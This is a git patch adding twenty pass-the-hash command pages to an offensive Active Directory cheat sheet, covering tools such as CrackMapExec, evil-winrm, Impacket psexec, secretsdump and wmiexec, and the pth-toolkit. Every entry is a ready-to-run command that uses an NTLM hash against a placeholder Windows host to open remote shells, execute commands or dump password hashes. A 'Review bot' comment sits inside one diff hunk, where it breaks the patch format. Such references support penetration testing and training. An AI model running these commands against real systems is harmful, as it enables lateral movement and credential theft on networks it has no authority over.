From 45ec5a7d8b9f610de4de2628083a8cb44d13b3e9 Mon Sep 17 00:00:00 2001 
From: Dipak Panchal <31427462+dipakpanchal05@users.noreply.github.com>
Date: Wed, 13 Aug 2025 15:55:58 +0530
Subject: [PATCH] Pass the hash commands [#Hash]

Updated commands for pass the hash
---
 _wadcoms/crackmapexec.md | 29 +++++++++++++++++++++++++++++
 _wadcoms/evil-winrm.md | 31 +++++++++++++++++++++++++++++++
 _wadcoms/impacket-atexec.md | 28 ++++++++++++++++++++++++++++
 _wadcoms/impacket-lookupsid.md | 29 +++++++++++++++++++++++++++++
 _wadcoms/impacket-psexec.md | 32 ++++++++++++++++++++++++++++++++
 _wadcoms/impacket-rpcdump.md | 30 ++++++++++++++++++++++++++++++
 _wadcoms/impacket-samrdump.md | 28 ++++++++++++++++++++++++++++
 _wadcoms/impacket-secretsdump.md | 29 +++++++++++++++++++++++++++++
 _wadcoms/impacket-smbclient.md | 30 ++++++++++++++++++++++++++++++
 _wadcoms/impacket-smbexec.md | 31 +++++++++++++++++++++++++++++++
 _wadcoms/impacket-wmiexec.md | 31 +++++++++++++++++++++++++++++++
 _wadcoms/pth-curl.md | 28 ++++++++++++++++++++++++++++
 _wadcoms/pth-net.md | 30 ++++++++++++++++++++++++++++++
 _wadcoms/pth-rpcclient.md | 30 ++++++++++++++++++++++++++++++
 _wadcoms/pth-smbclient.md | 31 +++++++++++++++++++++++++++++++
 _wadcoms/pth-sqsh.md | 29 +++++++++++++++++++++++++++++
 _wadcoms/pth-winexe.md | 30 ++++++++++++++++++++++++++++++
 _wadcoms/pth-wmic.md | 30 ++++++++++++++++++++++++++++++
 _wadcoms/pth-wmis.md | 30 ++++++++++++++++++++++++++++++
 _wadcoms/xfreerdp3.md | 29 +++++++++++++++++++++++++++++
 20 files changed, 595 insertions(+)
 create mode 100644 _wadcoms/crackmapexec.md
 create mode 100644 _wadcoms/evil-winrm.md
 create mode 100644 _wadcoms/impacket-atexec.md
 create mode 100644 _wadcoms/impacket-lookupsid.md
 create mode 100644 _wadcoms/impacket-psexec.md
 create mode 100644 _wadcoms/impacket-rpcdump.md
 create mode 100644 _wadcoms/impacket-samrdump.md
 create mode 100644 _wadcoms/impacket-secretsdump.md
 create mode 100644 _wadcoms/impacket-smbclient.md
 create mode 100644 _wadcoms/impacket-smbexec.md
 create mode 100644 _wadcoms/impacket-wmiexec.md
 create mode 100644 _wadcoms/pth-curl.md
 create mode 100644 _wadcoms/pth-net.md
 create mode 100644 _wadcoms/pth-rpcclient.md
 create mode 100644 _wadcoms/pth-smbclient.md
 create mode 100644 _wadcoms/pth-sqsh.md
 create mode 100644 _wadcoms/pth-winexe.md
 create mode 100644 _wadcoms/pth-wmic.md
 create mode 100644 _wadcoms/pth-wmis.md
 create mode 100644 _wadcoms/xfreerdp3.md
diff --git a/_wadcoms/crackmapexec.md b/_wadcoms/crackmapexec.md
new file mode 100644
index 0000000..20f848c
--- /dev/null
+++ b/_wadcoms/crackmapexec.md
@@ -0,0 +1,29 @@
+---
+description: Use CrackMapExec to perform SMB authentication with NTLM Pass-the-Hash against a subnet, enumerating SMB shares or verifying credentials.
+
+Command Reference:
+ Target IP: 10.10.10.1/24
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ crackmapexec smb 10.10.10.1/24 -u john -H 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396
+
+items:
+ - Hash
+
+services:
+ - SMB
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Enumeration
+
+references:
+ - https://github.com/byt3bl33d3r/CrackMapExec
+ - https://www.ired.team/offensive-security/lateral-movement/using-crackmapexec
+---
diff --git a/_wadcoms/evil-winrm.md b/_wadcoms/evil-winrm.md
new file mode 100644
index 0000000..520e580
--- /dev/null
+++ b/_wadcoms/evil-winrm.md
@@ -0,0 +1,31 @@
+---
+description: Authenticate to a remote Windows host over WinRM using NTLM Pass-the-Hash and obtain an interactive PowerShell session.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ evil-winrm -i 10.10.10.1 -u john -H 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396
+
+items:
+ - Hash
+ - Shell
+ - PowerShell
+
+services:
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+
+references:
+ - https://github.com/Hackplayers/evil-winrm
+ - https://book.hacktricks.xyz/windows-hardening/evil-winrm
+ - https://docs.microsoft.com/en-us/windows/win32/winrm/portal
+---
diff --git a/_wadcoms/impacket-atexec.md b/_wadcoms/impacket-atexec.md
new file mode 100644
index 0000000..ea1d8dd
--- /dev/null
+++ b/_wadcoms/impacket-atexec.md
@@ -0,0 +1,28 @@
+---
+description: Schedule a task remotely over SMB using Impacket's atexec with NTLM Pass-the-Hash to execute a command.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ impacket-atexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1 "whoami"
+
+items:
+ - Hash
+
+services:
+ - SMB
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+
+references:
+ - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/impacket-lookupsid.md b/_wadcoms/impacket-lookupsid.md
new file mode 100644
index 0000000..3d7e9e9
--- /dev/null
+++ b/_wadcoms/impacket-lookupsid.md
@@ -0,0 +1,29 @@
+---
+description: Enumerate domain SIDs and associated usernames using Impacket's lookupsid.py with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: test.local
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ impacket-lookupsid -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/john@10.10.10.1
+
+items:
+ - Hash
+
+services:
+ - SMB
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Enumeration
+
+references:
+ - https://github.com/fortra/impacket
+ - https://attack.mitre.org/techniques/T1087/
+---
diff --git a/_wadcoms/impacket-psexec.md b/_wadcoms/impacket-psexec.md
new file mode 100644
index 0000000..b4706d6
--- /dev/null
+++ b/_wadcoms/impacket-psexec.md
@@ -0,0 +1,32 @@
+---
+description: Execute commands on a remote Windows host as Administrator over SMB using Impacket's psexec with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ impacket-psexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1
+
+items:
+ - Hash
+ - Shell
+ - Powershell
+
+services:
+ - SMB
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+
+references:
+ - https://github.com/fortra/impacket
+ - https://www.hackingarticles.in/a-little-guide-to-impacket/
+ - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
+---
diff --git a/_wadcoms/impacket-rpcdump.md b/_wadcoms/impacket-rpcdump.md
new file mode 100644
index 0000000..4822953
--- /dev/null
+++ b/_wadcoms/impacket-rpcdump.md
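Review bot: The `items` list in the impacket-psexec entry uses `- Powershell`, while evil-winrm, impacket-smbexec and impacket-wmiexec in the same batch use `- PowerShell`; if the site filters on exact tag strings (I cannot see the filter vocabulary from this patch), that becomes two distinct tags for one concept, so this line should read `- PowerShell`. The same facet drift appears in the impacket-rpcdump entry, whose `items` list carries `- Enumeration` and whose `attack_types` list carries `- Pass-the-Hash`, and in impacket-smbclient, whose `items` list repeats `- SMB` from `services`; every other new entry keeps `items` to `Hash`/`Shell`/`PowerShell` and files `Enumeration`/`Exploitation`/`PrivEsc`/`Persistence` under `attack_types` only. Normalising those three entries to the vocabulary the rest of the batch uses would keep the new pages consistent with each other.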
@@ -0,0 +1,30 @@
+---
+description: Enumerate RPC services on a remote Windows machine using Impacket's rpcdump with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: test.local
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ impacket-rpcdump -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/john@10.10.10.1
+
+items:
+ - Hash
+ - Enumeration
+
+services:
+ - RPC
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Pass-the-Hash
+ - Enumeration
+
+references:
+ - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/impacket-samrdump.md b/_wadcoms/impacket-samrdump.md
new file mode 100644
index 0000000..4f72757
--- /dev/null
+++ b/_wadcoms/impacket-samrdump.md
@@ -0,0 +1,28 @@
+---
+description: Enumerate user accounts and groups from the SAM database over RPC using Impacket's samrdump with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: test.local
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ impacket-samrdump -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/john@10.10.10.1
+
+items:
+ - Hash
+
+services:
+ - RPC
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Enumeration
+
+references:
+ - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/impacket-secretsdump.md b/_wadcoms/impacket-secretsdump.md
new file mode 100644
index 0000000..d468d93
--- /dev/null
+++ b/_wadcoms/impacket-secretsdump.md
@@ -0,0 +1,29 @@
+---
+description: Dump password hashes and secrets from a remote Windows machine using Impacket's secretsdump with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ impacket-secretsdump -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1
+
+items:
+ - Hash
+
+services:
+ - SMB
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Enumeration
+ - PrivEsc
+
+references:
+ - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/impacket-smbclient.md b/_wadcoms/impacket-smbclient.md
new file mode 100644
index 0000000..e7d690d
--- /dev/null
+++ b/_wadcoms/impacket-smbclient.md
@@ -0,0 +1,30 @@
+---
+description: Use Impacket's smbclient to connect to SMB shares on a Windows host using NTLM Pass-the-Hash authentication.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: test.local
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ impacket-smbclient -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/john@10.10.10.1
+
+items:
+ - Hash
+ - SMB
+
+services:
+ - SMB
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Enumeration
+
+references:
+ - https://github.com/fortra/impacket
+ - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview
+---
diff --git a/_wadcoms/impacket-smbexec.md b/_wadcoms/impacket-smbexec.md
new file mode 100644
index 0000000..0106e18
--- /dev/null
+++ b/_wadcoms/impacket-smbexec.md
@@ -0,0 +1,31 @@
+---
+description: Execute commands remotely over SMB using Impacket's smbexec with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ impacket-smbexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1
+
+items:
+ - Hash
+ - Shell
+ - PowerShell
+
+services:
+ - SMB
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+
+references:
+ - https://github.com/fortra/impacket
+ - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview
+---
diff --git a/_wadcoms/impacket-wmiexec.md b/_wadcoms/impacket-wmiexec.md
new file mode 100644
index 0000000..3709e99
--- /dev/null
+++ b/_wadcoms/impacket-wmiexec.md
@@ -0,0 +1,31 @@
+---
+description: Execute commands remotely over WMI on a Windows host using Impacket's wmiexec with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ impacket-wmiexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1
+
+items:
+ - Hash
+ - Shell
+ - PowerShell
+
+services:
+ - WMI
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+ - Persistence
+
+references:
+ - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/pth-curl.md b/_wadcoms/pth-curl.md
new file mode 100644
index 0000000..cd8bdde
--- /dev/null
+++ b/_wadcoms/pth-curl.md
@@ -0,0 +1,28 @@
+---
+description: Download files from a remote server using curl with NTLM Pass-the-Hash authentication.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ pth-curl --ntlm -u john:580B16D486D8D2CAFA00B314D41FA396 http://10.10.10.1/secret.txt
+
+items:
+ - Hash
+
+services:
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Enumeration
+
+references:
+ - https://curl.se/docs/manual.html
+ - https://github.com/byt3bl33d3r/pth-toolkit
+---
diff --git a/_wadcoms/pth-net.md b/_wadcoms/pth-net.md
new file mode 100644
index 0000000..07b2f4f
--- /dev/null
+++ b/_wadcoms/pth-net.md
@@ -0,0 +1,30 @@
+---
+description: Enumerate SMB shares on a remote machine using the net rpc share list command with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: test.local
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ pth-net rpc share list -U 'test.local\john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396' -S 10.10.10.1
+
+items:
+ - Hash
+
+services:
+ - SMB
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Enumeration
+
+references:
+ - https://www.samba.org/samba/docs/current/man-html/net.8.html
+ - https://github.com/byt3bl33d3r/pth-toolkit
+ - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview
+---
diff --git a/_wadcoms/pth-rpcclient.md b/_wadcoms/pth-rpcclient.md
new file mode 100644
index 0000000..e840e4f
--- /dev/null
+++ b/_wadcoms/pth-rpcclient.md
@@ -0,0 +1,30 @@
+---
+description: Interact with RPC services on a remote Windows machine using rpcclient with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: test.local
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ pth-rpcclient -U test.local/john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 //10.10.10.1
+
+items:
+ - Hash
+
+services:
+ - RPC
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Enumeration
+
+references:
+ - https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html
+ - https://github.com/byt3bl33d3r/pth-toolkit
+ - https://learn.microsoft.com/en-us/windows/win32/rpc/rpc-start-page
+---
diff --git a/_wadcoms/pth-smbclient.md b/_wadcoms/pth-smbclient.md
new file mode 100644
index 0000000..c537242
--- /dev/null
+++ b/_wadcoms/pth-smbclient.md
@@ -0,0 +1,31 @@
+---
+description: Connect to an SMB share on a remote Windows host using smbclient with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: test.local
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ pth-smbclient -U test.local/john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 //10.10.10.1/C$
+
+items:
+ - Hash
+
+services:
+ - SMB
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+ - Persistence
+
+references:
+ - https://www.samba.org/samba/docs/current/man-html/smbclient.1.html
+ - https://github.com/byt3bl33d3r/pth-toolkit
+ - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview
+---
diff --git a/_wadcoms/pth-sqsh.md b/_wadcoms/pth-sqsh.md
new file mode 100644
index 0000000..bd42169
--- /dev/null
+++ b/_wadcoms/pth-sqsh.md
@@ -0,0 +1,29 @@
+---
+description: Connect to a remote SQL Server instance using sqsh with NTLM Pass-the-Hash authentication.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ pth-sqsh -S 10.10.10.1 -U john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396
+
+items:
+ - Hash
+
+services:
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+
+references:
+ - http://www.sqsh.org/
+ - https://github.com/byt3bl33d3r/pth-toolkit
+ - https://learn.microsoft.com/en-us/sql/sql-server/?view=sql-server-ver16
+---
diff --git a/_wadcoms/pth-winexe.md b/_wadcoms/pth-winexe.md
new file mode 100644
index 0000000..40412b8
--- /dev/null
+++ b/_wadcoms/pth-winexe.md
@@ -0,0 +1,30 @@
+---
+description: Execute commands remotely over SMB using winexe with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ pth-winexe -U john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 //10.10.10.1 cmd.exe
+
+items:
+ - Hash
+
+services:
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+ - Persistence
+
+references:
+ - https://github.com/ahmedkhlief/winexe
+ - https://github.com/byt3bl33d3r/pth-toolkit
+ - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview
+---
diff --git a/_wadcoms/pth-wmic.md b/_wadcoms/pth-wmic.md
new file mode 100644
index 0000000..ca61e07
--- /dev/null
+++ b/_wadcoms/pth-wmic.md
@@ -0,0 +1,30 @@
+---
+description: Execute processes remotely over WMI using wmic with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ pth-wmic -U john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 --namespace //root/cimv2 --node 10.10.10.1 process call create "cmd.exe /c whoami"
+
+items:
+ - Hash
+
+services:
+ - WMI
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+ - Persistence
+
+references:
+ - https://github.com/byt3bl33d3r/pth-toolkit
+ - https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page
+---
diff --git a/_wadcoms/pth-wmis.md b/_wadcoms/pth-wmis.md
new file mode 100644
index 0000000..197ce71
--- /dev/null
+++ b/_wadcoms/pth-wmis.md
@@ -0,0 +1,30 @@
+---
+description: Execute commands remotely over WMI using wmis with NTLM Pass-the-Hash.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ pth-wmis -U john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 10.10.10.1
+
+items:
+ - Hash
+
+services:
+ - WMI
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+ - Persistence
+
+references:
+ - https://github.com/byt3bl33d3r/pth-toolkit
+ - https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page
+---
diff --git a/_wadcoms/xfreerdp3.md b/_wadcoms/xfreerdp3.md
new file mode 100644
index 0000000..fe3bed2
--- /dev/null
+++ b/_wadcoms/xfreerdp3.md
@@ -0,0 +1,29 @@
+---
+description: Connect to a remote Windows desktop via RDP using NTLM Pass-the-Hash authentication, bypassing certificate warnings.
+
+Command Reference:
+ Target IP: 10.10.10.1
+ Domain: N/A
+ Username: john
+ Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+ xfreerdp3 /v:10.10.10.1 /u:john /pth:580B16D486D8D2CAFA00B314D41FA396 /cert:ignore
+
+items:
+ - Hash
+
+services:
+ - NTLM
+
+OS:
+ - Windows
+
+attack_types:
+ - Exploitation
+ - PrivEsc
+
+references:
+ - https://github.com/FreeRDP/FreeRDP
+ - https://www.kali.org/tools/freerdp3/#xfreerdp3
+---